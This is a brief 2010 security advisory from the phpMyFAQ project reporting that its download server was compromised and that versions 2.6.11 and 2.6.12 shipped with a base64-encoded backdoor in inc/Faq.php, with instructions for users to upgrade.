Security Advisory 2010-12-15

phpmyfaq.de compromised

The main server of the phpMyFAQ Project was compromised in an attack, allowing a rogue version

of the phpMyfAQ software to be uploaded and distributed from december 4th until december 15th.

The affected versions were phpMyFAQ 2.6.11 and 2.6.12, both zip and tar.gz package. The attacker

also changed the MD5 files.

The attacker added a backdoor into the file inc/Faq.php in the method getTopTen(). The code was

base64 encoded and first sent an e-mail to a GMail address and added an entry in the faqconfig

table. With this entry, a backdoor was opened to include to include arbitrary PHP code.

The phpMyFAQ Team will release a new clean phpMyFAQ version 2.6.13. All users of affected

phpMyFAQ versions are encouraged to upgrade as soon as possible to this latest version.

If you use phpMyFAQ 2.6.11 or phpMyFAQ 2.6.12 downloaded after december 4th or before december

15th you should change the file inc/Faq.php as soon as possible.